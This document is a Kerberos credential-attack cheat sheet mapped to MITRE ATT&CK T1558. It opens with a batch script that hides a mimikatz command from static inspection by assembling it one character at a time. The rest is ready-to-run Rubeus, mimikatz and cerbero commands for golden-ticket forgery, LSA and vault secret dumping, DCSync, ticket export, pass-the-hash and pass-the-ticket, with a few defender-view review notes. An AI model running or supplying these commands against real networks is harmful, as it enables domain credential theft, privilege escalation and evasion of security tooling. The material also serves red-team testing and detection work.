MITRE ATT&CK Enterprise: T1558 Steal and Forge Kerberos Tickets
1. command-obfuscation
REM Script file to obfuscate the token manipulation commands: every character of the
REM command is kept in its own single-letter variable and the string is only
REM assembled at run time, so the full literal never appears in this file.
@echo off
REM One character per variable; the set order (z down to l) is the reverse of the
REM concatenation order used for Pwn below.
set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
REM Concatenate the pieces (l first, z last) into Pwn.
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
REM NOTE(review): the split only defeats static inspection of this file. The assembled
REM string is echoed to the console here and is expanded onto the command line of the
REM process started on the next line, so command-line auditing (process-creation
REM logging) records it in clear.
echo %Pwn%
C:\Users\Public\SafetyKatz.exe %Pwn% exit
2. cleartext-2-nthash
# Compute the NT hash of the target account's clear-text password.
cerbero hash $ztarg_user_pass -u $zdom_fqdn/$ztarg_user_name
# Placeholders for the derived key material — presumably filled in by hand from the
# output above (the $z... names look like template placeholders used throughout this
# page rather than real shell variables; confirm).
$ztarg_user_nthash=""
$ztarg_user_aes256k=""
3. get-tgt
# Request a TGT for the target user with cerbero using the AES256 key, in two variants
# (against the DC and against a target computer); -vv gives verbose output.
cerbero ask -u $zdom_fqdn/$ztarg_user_name@ztarg_dc_fqdn --aes $ztarg_user_aes256k -k $zdom_dc_ip -vv
cerbero ask -u $zdom_fqdn/$ztarg_user_name@ztarg_computer_fqdn --aes $ztarg_user_aes256k -k $zdom_dc_ip -vv
# Same request with Rubeus, authenticating with the password; /ptt passes the resulting
# ticket into the current session (see section 11).
./Rubeus.exe asktgt /user:$ztarg_user_name /password:$ztarg_user_pass /domain:$zdom /dc:$zdom_dc_fqdn /ptt
# Mimikatz sekurlsa::ekeys lists the Kerberos encryption keys held by LSASS; from a
# defender's view this is the step that shows up as LSASS memory access.
Invoke-Mimi -Command '"sekurlsa::ekeys"'
4. golden
# contains secrets for the: scheduled tasks, ...
# NOTE(review): the header above appears to be copied from section 5 (vault). The command
# below forges a golden ticket from the account's AES256 key and SID, resolving the
# remaining details via LDAP; with /printcmd it appears to only print the resulting
# command rather than injecting a ticket — confirm.
Rubeus.exe -args golden /aes256:$ztarg_user_hash /sid:$ztarg_user_sid /ldap /user:$ztarg_user_name /printcmd
5. vault
# Dump the Windows credential vault, which contains secrets for e.g. scheduled tasks;
# token::elevate runs first so the dump has the privileges it needs.
Invoke-Mimi -Command '"token::elevate" "vault::cred /patch"'
6. lsadump-lsa
# Dump secrets from the LSA process (lsadump::lsa /patch) after elevating the token.
Invoke-Mimi -Command '"token::elevate" "lsadump::lsa /patch"'
7. lsadump-dcsync
# DCSync: pull account secrets through the domain replication protocol. From a defender's
# view this is directory replication traffic originating from a host that is not a
# domain controller.
Invoke-Mimi -Command '"token::elevate" "lsadump::dcsync"'
8. ccache-convert
# Convert a Linux Kerberos ticket (.ccache) to the Windows format (.krb), with either tool:
ticketConverter.py $ztarg_user_name".ccache" $ztarg_user_name".krb"
cerbero convert -i $ztarg_user_name".ccache" -o $ztarg_user_name".krb"
9. krb-export
# Export the Kerberos tickets of the current session to files from an interactive
# mimikatz session (the last line is typed at the mimikatz prompt).
cd C:\tools\mimikatz\x64
mimikatz.exe privilege:debug
kerberos::list /export
10. krb-pth
# Run PowerShell with pass-the-hash from an interactive mimikatz session: the RC4 (NT)
# hash stands in for the password and the new process runs as the lateral-movement user.
mimikatz.exe
privilege::debug
sekurlsa::pth /user:$zlat_user /rc4:xxx /domain:$zdom /dc:$zdom_dc_fqdn /run:"powershell -ep bypass"
# opth (overpass-the-hash) with Rubeus: %Pwn% is an obfuscated verb assembled as in
# section 1, /createnetonly starts a sacrificial cmd.exe in a new logon session (see
# section 11) and /ptt passes the ticket into it.
Rubeus.exe -args %Pwn% /user:$ztarg_user_name /aes256:$ztarg_user_hash /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
11. krb-ptt
# Request a TGT as the target user (RC4/NT hash) and pass it into the current session.
# NOTE: clear the tickets in the current session first (with 'klist purge') so the
# session does not end up holding multiple active TGTs.
.\Rubeus.exe asktgt /user:$ztarg_user_name /rc4:$ztarg_user_hash /ptt
# Alternatively pass the ticket into a sacrificial hidden process (a new cmd.exe logon
# session), e.g. to steal the token from that process afterwards (requires elevation).
.\Rubeus.exe asktgt /user:$ztarg_user_name /rc4:$ztarg_user_hash /createnetonly:C:\Windows\System32\cmd.exe